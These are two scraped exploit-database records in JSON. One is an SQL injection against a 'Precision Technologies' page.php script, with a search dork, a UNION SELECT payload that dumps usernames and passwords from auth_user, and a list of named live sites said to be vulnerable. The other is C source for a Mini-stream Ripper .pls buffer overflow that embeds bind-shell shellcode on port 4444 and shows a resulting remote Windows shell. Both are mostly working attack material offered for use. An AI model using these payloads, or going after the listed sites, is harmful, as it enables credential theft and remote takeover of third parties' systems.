{"type": "zdt", "lastseen": "2016-04-19T01:43:21", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Precision Technologies(page.php)sql Injection Vulnerability", "published": "2011-08-17T00:00:00", "href": "http://0day.today/exploit/description/16702", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for php platform in category web applications", "hash": "1119f9017e5c6be929c586d87fde7521e568d50a0c615384f14b02775c158afb", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability\r\n# Date: 17/8/2011\r\n# Author: Angel Injection\r\n# home Page: http://www.club-h.co.cc , http://www.sec-krb.org\r\n# Email: Angel-Injection[at]hotmail.com\r\n# Vendor or Software Link: http://www.pretechno.com\r\n# Version: N/A\r\n# Category:: webapps\r\n# Google dork: intext:\"powered by Precision Technologies\" inurl:\"page.php?id=\"\r\n# Tested on: Back Track 5\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nExploit\r\n\r\nhttp://localhost/page.php?id=1'\r\n\r\nhttp://localhost/page.php?id=1[injection here]\r\n\r\nhttp://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--\r\n\r\nDemo sites\r\nhttp://www.cibmrd.com/page.php?id=%27\r\nhttp://www.nirmaltours.com/page.php?id=1%27\r\nhttp://prakritiwomen.org/page.php?id=1\r\nhttp://www.cardicareaipc.com/page.php?id=1%27\r\nhttp://www.opaquegroup.com/page.php?id=1%27\r\nhttp://synergy-pune.com/page.php?id=1%27\r\n\r\n\r\n-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----\r\nThanks to all the people of Iraq And Club Hack Team\r\n\r\n\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-16702", "sourceHref": "http://0day.today/exploit/16702", "modified": "2011-08-17T00:00:00", "reporter": "Angel Injection", "enchantments": {"vulnersScore": 6.4}}

{"result": {"zdt": [{"lastseen": "2016-04-19T02:34:42", "references": [], "description": "Exploit for unknown platform in category local exploits", "edition": 1, "reporter": "mr_me", "published": "2009-12-27T00:00:00", "type": "zdt", "title": "Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-12-27T00:00:00", "href": "http://0day.today/exploit/description/8215", "id": "1337DAY-ID-8215", "sourceData": "============================================================================\r\nMini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\n============================================================================\r\n\r\n\r\n\r\n# Title: Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: mr_me\r\n# Published: 2009-12-27\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n/*\r\n \r\nriptheministreamripper.c\r\n \r\nMini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\nexploited by: mr_me\r\nGreetz to the Corlan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r\r\nVisit: corelanc0d3r's blog http://www.corelan.be:8800/\r\nreference: http://www.exploit-db.com/exploits/10646\r\nDownload: http://mini-stream.net/\r\nTested on: Windows XP sp3\r\n \r\nNote: *** For educational purposes only ***\r\n \r\nusage:\r\nCompile and execute to create the .pls file and upload it to your favourite server.\r\nThen click on 'LOAD' and then 'URL'. Enter the evil URL, BAM you win.\r\n \r\nmrme@backtrack:~$ nc -v 192.168.2.5 4444\r\n192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out\r\n(UNKNOWN) [192.168.2.5] 4444 (?) open\r\nMicrosoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n \r\nC:\\Program Files\\Mini-stream\\Mini-stream Ripper>\r\n \r\nI hope everyone had a Merry Christmas! and soon to have a Happy New Year!\r\n \r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\n/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum\r\n http://metasploit.com */\r\n \r\nunsigned char shell[] =\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\"\r\n\"\\x4f\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x58\"\r\n\"\\x4e\\x56\\x46\\x32\\x46\\x32\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x58\\x4e\\x47\"\r\n\"\\x45\\x50\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x41\\x4b\\x58\"\r\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x43\\x4e\\x42\\x53\\x49\\x54\\x4b\\x38\"\r\n\"\\x46\\x53\\x4b\\x58\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\"\r\n\"\\x46\\x58\\x42\\x4c\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\"\r\n\"\\x44\\x4c\\x4b\\x4e\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x42\\x4a\\x42\\x45\\x57\"\r\n\"\\x43\\x4e\\x4b\\x58\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x58\"\r\n\"\\x4e\\x50\\x4b\\x34\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\"\r\n\"\\x4e\\x52\\x4b\\x48\\x49\\x38\\x4e\\x36\\x46\\x42\\x4e\\x41\\x41\\x56\\x43\\x4c\"\r\n\"\\x41\\x43\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x33\\x4b\\x58\\x42\\x44\"\r\n\"\\x4e\\x50\\x4b\\x38\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x48\\x42\\x54\\x4a\\x50\"\r\n\"\\x50\\x35\\x4a\\x46\\x50\\x58\\x50\\x44\\x50\\x50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x41\\x53\\x4b\\x4d\\x48\\x36\\x43\\x55\\x48\\x56\\x4a\\x36\\x43\\x33\"\r\n\"\\x44\\x33\\x4a\\x56\\x47\\x47\\x43\\x47\\x44\\x33\\x4f\\x55\\x46\\x55\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x4f\\x35\\x49\\x48\\x45\\x4e\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x50\"\r\n\"\\x44\\x30\\x45\\x55\\x4c\\x46\\x44\\x50\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x49\\x4d\"\r\n\"\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\"\r\n\"\\x43\\x55\\x43\\x55\\x43\\x45\\x43\\x34\\x43\\x45\\x43\\x34\\x43\\x35\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x48\\x56\\x4a\\x56\\x41\\x41\\x4e\\x35\\x48\\x36\\x43\\x35\\x49\\x38\"\r\n\"\\x41\\x4e\\x45\\x49\\x4a\\x46\\x46\\x4a\\x4c\\x51\\x42\\x57\\x47\\x4c\\x47\\x55\"\r\n\"\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31\\x41\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\r\n\"\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\r\n\"\\x43\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x45\\x4e\\x49\\x44\\x48\\x38\"\r\n\"\\x49\\x54\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x42\\x55\\x46\\x35\\x46\\x45\\x45\\x35\"\r\n\"\\x4f\\x4f\\x42\\x4d\\x43\\x49\\x4a\\x56\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\"\r\n\"\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4c\\x56\"\r\n\"\\x46\\x46\\x48\\x36\\x4a\\x46\\x43\\x56\\x4d\\x56\\x49\\x38\\x45\\x4e\\x4c\\x56\"\r\n\"\\x42\\x55\\x49\\x55\\x49\\x52\\x4e\\x4c\\x49\\x48\\x47\\x4e\\x4c\\x36\\x46\\x54\"\r\n\"\\x49\\x58\\x44\\x4e\\x41\\x43\\x42\\x4c\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\"\r\n\"\\x4d\\x32\\x50\\x4f\\x44\\x54\\x4e\\x52\\x43\\x49\\x4d\\x58\\x4c\\x47\\x4a\\x53\"\r\n\"\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x51\"\r\n\"\\x4f\\x4f\\x45\\x57\\x46\\x54\\x4f\\x4f\\x48\\x4d\\x4b\\x45\\x47\\x35\\x44\\x35\"\r\n\"\\x41\\x35\\x41\\x55\\x41\\x35\\x4c\\x46\\x41\\x50\\x41\\x35\\x41\\x45\\x45\\x35\"\r\n\"\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\"\r\n\"\\x43\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4b\\x58\\x47\\x45\\x4e\\x4f\\x43\\x38\\x46\\x4c\\x46\\x36\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4f\\x4e\\x50\\x4c\\x42\\x4e\"\r\n\"\\x42\\x36\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x42\\x4d\\x5a\";\r\n \r\nint main ( int argc , char * argv[])\r\n{\r\n FILE* expfle= NULL;\r\n char* EIP = \"\\x53\\x93\\x42\\x7e\"; // jmp esp -> user32.dll\r\n int i;\r\n \r\n printf(\"\\t. .. ... Mini-stream Ripper (.pls) Stack buffer Overflow Exploit ... .. .\\r\\n\");\r\n printf(\"\\t -------> now upload the .pls file to a remote server <-------\\n\");\r\n \r\n \r\n if( (expfle=fopen(\"mini-stream-ripper.pls\",\"wb\")) ==NULL )\r\n {\r\n perror(\"Cannot create the exploit file!!! :(\");\r\n exit(0);\r\n }\r\n \r\n for (i=0; i<17405; i++)\r\n {\r\n fwrite(\"\\x41\", 1, 1, expfle); // Junk\r\n }\r\n \r\n fwrite(EIP, 4, 1, expfle); // ret\r\n \r\n for (i=0; i<10; i++)\r\n {\r\n fwrite(\"\\x90\", 1, 1, expfle); // Nop's\r\n }\r\n \r\n fwrite(shell, sizeof(shell), 1, expfle); // write the shell\r\n \r\n for (i=0; i<16702; i++)\r\n {\r\n fwrite(\"\\xcc\", 1, 1, expfle); // finish off buffer\r\n }\r\n \r\n fclose(expfle);\r\n \r\n printf(\"[+] mini-stream-ripper.pls Created successfully! \\r\\n\");\r\n printf(\"[+] Exploited by mr_me \\r\\n\");\r\n \r\n return 0;\r\n \r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/8215"}]}}